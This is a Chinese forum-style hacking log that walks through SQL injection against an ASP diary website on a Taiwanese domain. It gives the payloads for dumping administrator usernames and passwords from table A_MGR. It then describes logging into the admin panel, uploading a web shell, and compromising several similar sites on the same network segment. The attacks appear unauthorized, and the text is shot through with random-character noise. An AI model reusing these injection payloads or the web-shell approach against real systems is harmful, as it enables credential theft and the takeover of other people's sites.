发现一个注入点/ D9 z" r) {) F; |
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
' U6 J+ h' m, @
& n- T/ ^/ t, _8 `8 }习惯性的加’having1=1--! C+ i: b7 V* d. @* S9 L
& e. ?0 G) l5 u* ~
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
7 t* p" E. ^& v0 z9 J) C8 `$ h# ]0 Q1 r* D+ j5 l C
02 c; E9 \! y! V
8 [* I1 ^) R# K6 m% Z9 g
爆出Diary_A.dl_Title(这时候很激动啊). @, [8 C, I! i, [( a v% z5 j
" }+ m2 v0 o3 B$ J2 K
那么继续
) Q/ a2 y; n o9 s6 q' X: Phttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—6 j- w1 C: n, z. }
) M* Y8 a; P; b, p2 Y
继续,一直爆下去
! l& z6 ?# Y4 f+ m( ~' {) K9 @9 G3 j, D" C+ ^' f
爆到几个字段和表段 但是没找到需要的管理用户的字段% j. y% c3 M1 S8 V2 ~: g# m. n- i# Q
$ H7 ~; t( H4 |) n* S8 Z9 n! T# b
蛋疼了 怎么办 然后去后台登陆页看源码
. w: `8 M5 l/ a* f8 f! p+ J- T- l" I9 _! x, d4 d
0
5 y T9 K+ v* \' \" N
; k. V9 {& J2 S! e! ] CInput name= “ADUID”
- L1 z1 w( I3 T/ eInput name= “ADPWD”
( `/ `# ~0 d- z+ L9 l# c# _( P3 _' v1 |& J/ w
很幸运 找到了字段那就继续
( E* O: I k; }' b) Z找到之后开始爆用户
. ~; T7 P& F8 C' Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
# h8 n( o4 h6 K4 A" j$ J+ X6 a爆密码& |# n- Q' n; \: P) O: {
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
) c$ t$ N! A4 p X测试了下 这个注入点只能爆到文章哪里的表 - C1 M- Q- J) S+ Z% R
. N$ y' B% u! @2 \0 }头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
# Q, p! P, [( G+ G7 s o) R5 k' A. x. y, g) H/ z. x" z9 C( w
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了, [# k' X3 w% T4 Z, K- Q! e8 s1 Y: l% t
6 _3 ?5 Q$ n# R8 `
473: l' c4 r& `( W- K/ k7 x' X
' j0 L$ z$ D+ m1 P- k8 C7 ~
进后台+ y( f- P6 p, x2 m1 Q5 U6 T# N
: u" @% c7 x- ? T0 W) W
6 \) t1 ^# M- B; |" |; w- q发现几个上传点 有的地方不能上传 而且防止恶意代码: }; f+ ~- g7 F7 W7 d8 a
3 G, c* g5 W6 L1 H没办法 各种百度各种找大牛 找到一只好像可以突破的马( g/ [2 q# Z$ W& h
+ q% ^! m" Z9 d% {) _& Y1 ~" F6 _+ o% L. T: K* r% S
在系统管理那里直接上传 不过没有显示地址' b- s+ x& K) }( Y. q) M4 Z
) g8 a$ b, T' \4 z0 K6 p
再上传一次 抓包 搞定OK
# x0 |+ r, X7 f+ W
2 m9 L, C4 A o3 d! e4 _$ ?1 p0 |5 c. L- e/ }- t9 `3 B2 m
# R! A2 |1 _, |4 i/ ^472
! H- i4 `. @% y3 O
* ]) z+ z- Y+ n" m% g8 [3 R晚上不行了 去睡觉。。。7 ?7 g0 l; Q) W, r
第二天刚起床 闲的没事做继续日站吧
; O0 L9 B2 V6 v8 e; `* v# }% C: g) X
找个站 就把这个站的旁c扫了下
5 O1 u! x* r7 F9 v$ c5 J& G+ _5 j7 b/ r1 ~5 V8 Y: ^4 e) E6 ]
发现c段也有一个购物站 ,然后还和这个站的模板差不多: B1 Z1 x p: j: [5 Y
- x# x* ]! i* F: H3 N& r& r0 c' c
就找到会员登录口测试
9 J8 @3 L7 G) X! X
* g' W0 o1 X' i' ~'and (select top 1 MGR_UID from A_MGR)>0—
$ v& P! m* e# V! F1 Z0 ~果断爆到了 这时候我很激动 通杀
! S6 L4 Y3 _ {6 @
( B9 k0 I! j) t P: @( U) D4 t: K再次翻c段
8 W9 a0 \4 F: Y; g# ^: L
& H$ P0 T0 e) r/ M& R% T, w: a翻出几个站 都成功拿下
7 V* M U. C/ _6 Z% @+ k
6 V! w. E, Q2 A) t" J# `" W+ N; W7 G7 `6 j$ ]+ j$ d: I% K- M$ b
! r% X. \. I8 n* g2 W
修复方案:
+ ^! Q! q2 W4 S7 [3 F( n4 q1 h他们比我专业 4 c! W# ?7 ~4 i" r2 o
% H/ o' r6 Y, r3 l' Z; H
: v1 w$ G3 i, h2 d6 h$ I7 r$ _) y/ {' ~( S% l0 o: k, V S
|